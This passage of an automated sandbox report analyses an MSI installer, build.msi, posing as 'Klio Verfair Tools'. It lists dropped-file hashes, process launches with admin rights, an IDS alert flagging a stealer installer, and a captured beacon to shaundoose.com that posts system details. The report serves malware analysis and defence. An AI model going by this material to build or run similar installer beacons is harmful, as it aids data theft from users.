                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):1.2441380912920412
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:sjiukSI+CFXJXT5WtiJAAErCy6mSRvmySROT74Ba:WiFvTYYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:F9983A9EC8396C9981CF57BD86D4EA78
                                                                                                                                                                                          SHA1:F97BB58F3F5D64856A95DEBD893CECC45B4F48A8
                                                                                                                                                                                          SHA-256:694C61341DAAE8CFAA0B2976FF9D2C5C1ED659D53F6AA9AB2D4307199EF66E99
                                                                                                                                                                                          SHA-512:10DC57DA4A8A579B77F555F1504C1AE4A7A689663B848E5F059B3EE39E43513F0FB2569BC5F38BE099A92C4A5AA06964A2A50AA1ADBF16F204FC41501AA75628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):0.06919379217133059
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOcOQvPOIyVky6l3X:2F0i8n0itFzDHFcOaPX3X
                                                                                                                                                                                          MD5:FE65CA18FD80659152BC9C0E4513ED31
                                                                                                                                                                                          SHA1:342A3407A6044E6B469A1467C0C14259E745CFA2
                                                                                                                                                                                          SHA-256:1398E299833FB7909EB193DC24C7CBAC042DDAF68251996A45BE381C4031178F
                                                                                                                                                                                          SHA-512:BE17BDADEFFAF121085AA9927BD84C94A77DC27B80A13DCCAD5A5766B1126034DF45AA389C881DD840EE11F5A1F0DC640EFD25F3882FC2FB19C8D8F31DFC5637
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.5509684898091587
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:M8PhquRc06WXJ8jT5+tiJAAErCy6mSRvmySROT74Ba:jhq1fjTwYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:ED0C0936EE47E3E1B948915C94CE0A5A
                                                                                                                                                                                          SHA1:3C8E9205594295088B065FB30FCE74BB7D701423
                                                                                                                                                                                          SHA-256:763BD8FB55321BB49E5A7023FDE57BA879E4E39B6E21D0D3727CF08D3E0711FC
                                                                                                                                                                                          SHA-512:B7C91D781D98E78E1DDA47BB0790749E99F0567DD12AAC664829EF882E385ACA7D127894A22738BA30760A22D7B10D9AB0E927F40D09BB9681D80049F068B56C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}, Number of Words: 10, Subject: Klio Verfair Tools, Author: TasovCoop, Name of Creating Application: Klio Verfair Tools, Template: ;1033, Comments: This installer database contains the logic and data required to install Klio Verfair Tools., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 23 16:43:52 2025, Last Saved Time/Date: Sun Mar 23 16:43:52 2025, Last Printed: Sun Mar 23 16:43:52 2025, Number of Pages: 450
                                                                                                                                                                                          Entropy (8bit):7.31982440208669
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Windows SDK Setup Transform Script (63028/2) 88.73%
                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 11.27%
                                                                                                                                                                                          File name:build.msi
                                                                                                                                                                                          File size:65'046'016 bytes
                                                                                                                                                                                          MD5:cc9a4fbbbabad106e40b7577f6dbbcc1
                                                                                                                                                                                          SHA1:4edf9195188e721a7b5f394032ddb987144f918e
                                                                                                                                                                                          SHA256:0b268732e81427c10afaa9679c60485a5c8a71c839f268b6e0e0d7c57efb3832
                                                                                                                                                                                          SHA512:059a987598cd67f4603ccdb1721e136890bc07da30527105e0a86bbf68bb657f1c9c32539e29d09524cb804496fd925931aa2efcf8a7d373f1ef71318c4546bc
                                                                                                                                                                                          SSDEEP:786432:D0zVmrjV7eIAtC9OTZm/lD0qKZIr6KmOwCHu5PVpraze:DSVmrjV7eI/9OTZ0PmOC5W
                                                                                                                                                                                          TLSH:94E77C01B3FA4148F2F75EB17EBA45A594BABD521B30C0EF1204660E1B72BC25BB5763
                                                                                                                                                                                          File Content Preview:........................>............................................#..................................................................z...............................................................................................g......................
                                                                                                                                                                                          Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                          2025-03-25T21:01:49.311225+01002829202ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA1192.168.2.549721104.21.64.101443TCP
                                                                                                                                                                                          • Total Packets: 11
                                                                                                                                                                                          • 443 (HTTPS)
                                                                                                                                                                                          • 53 (DNS)
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Mar 25, 2025 21:01:49.035160065 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.035195112 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:49.035286903 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.037451982 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.037462950 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:49.259216070 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:49.259298086 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.308525085 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.308547020 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:49.309120893 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:49.309187889 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.311006069 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.311131954 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:49.311156988 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:50.553378105 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:50.553484917 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          Mar 25, 2025 21:01:50.553556919 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:50.721992016 CET49721443192.168.2.5104.21.64.101
                                                                                                                                                                                          Mar 25, 2025 21:01:50.722012043 CET44349721104.21.64.101192.168.2.5
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Mar 25, 2025 21:01:48.920177937 CET5898953192.168.2.51.1.1.1
                                                                                                                                                                                          Mar 25, 2025 21:01:49.028214931 CET53589891.1.1.1192.168.2.5
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Mar 25, 2025 21:01:48.920177937 CET192.168.2.51.1.1.10x2febStandard query (0)shaundoose.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Mar 25, 2025 21:01:49.028214931 CET1.1.1.1192.168.2.50x2febNo error (0)shaundoose.com104.21.64.101A (IP address)IN (0x0001)false
                                                                                                                                                                                          Mar 25, 2025 21:01:49.028214931 CET1.1.1.1192.168.2.50x2febNo error (0)shaundoose.com172.67.181.22A (IP address)IN (0x0001)false
                                                                                                                                                                                          • shaundoose.com
                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.549721104.21.64.1014438376C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-03-25 20:01:49 UTC196OUTPOST /diagnostics.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                          User-Agent: AdvancedInstaller
                                                                                                                                                                                          Host: shaundoose.com
                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2025-03-25 20:01:49 UTC53OUTData Raw: 44 61 74 65 3d 32 35 25 32 46 30 33 25 32 46 32 30 32 35 26 44 69 73 6b 50 72 6f 6d 70 74 3d 25 35 42 31 25 35 44 26 56 65 72 73 69 6f 6e 4e 54 3d 31 30 30 30
                                                                                                                                                                                          Data Ascii: Date=25%2F03%2F2025&DiskPrompt=%5B1%5D&VersionNT=1000
                                                                                                                                                                                          2025-03-25 20:01:50 UTC845INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Tue, 25 Mar 2025 20:01:50 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: no-store
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPaEVFNOQSXoRafSpHq2TIJy4i2m%2F3ozpLl%2FHBbEcioaW5fuKtreo%2BxHfxBROv7dKQyeTXJ9zLl3fyPpEWLg1i7c6MRm%2FTEiR4Yov%2FzHmSw5eHiSkkQ1qi9kiEriT4vmdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 9261009c09c2c674-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=100598&min_rtt=99906&rtt_var=21793&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=909&delivery_rate=37287&cwnd=238&unsent_bytes=0&cid=ab5a8d8c329be8c5&ts=1307&x=0"
                                                                                                                                                                                          2025-03-25 20:01:50 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                                                                                                                                                          Data Ascii: 10
                                                                                                                                                                                          2025-03-25 20:01:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          050100s0.0010203040MB

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          • File
                                                                                                                                                                                          • Registry

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:16:01:42
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi"
                                                                                                                                                                                          Imagebase:0x7ff79ef00000
                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:16:01:43
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                          Imagebase:0x7ff79ef00000
                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:false
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:16:01:47
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E
                                                                                                                                                                                          Imagebase:0xf10000
                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:16:02:00
                                                                                                                                                                                          Start date:25/03/2025
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"
                                                                                                                                                                                          Imagebase:0x7ff735da0000
                                                                                                                                                                                          File size:16'065'496 bytes
                                                                                                                                                                                          MD5 hash:C02DC2CA96FE9841963883C0FE177399
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2598148437.00007FF735DA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000009.00000002.2598070019.00007FF735DA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2598932527.00007FF73633D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2598932527.00007FF7364C1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2598932527.00007FF7364C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2598932527.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2599941032.00007FF7365B7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601389246.00007FF736BC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601462897.00007FF736BC2000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601497523.00007FF736BC5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601515109.00007FF736BC6000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601612283.00007FF736BD6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601736670.00007FF736BD9000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601768844.00007FF736BDF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601796438.00007FF736BE0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601851248.00007FF736BE3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601851248.00007FF736BE9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2601851248.00007FF736BF5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000009.00000002.2602010835.00007FF736C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff735da0000_launcher.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                          • Opcode ID: 3be227cb8252aac31629724096c608187ebffdc99491d3ac1e2d2a14734ec97e
                                                                                                                                                                                          • Instruction ID: 81103fe5eae4f231ede8f8f139dfed694abbcc42c387d9817b6cca9ccf4ac8b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be227cb8252aac31629724096c608187ebffdc99491d3ac1e2d2a14734ec97e
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11AC22B14F059AFB00DF60EC446B973A4FB48B28F840E35EA6D46BA4DF78D1A48350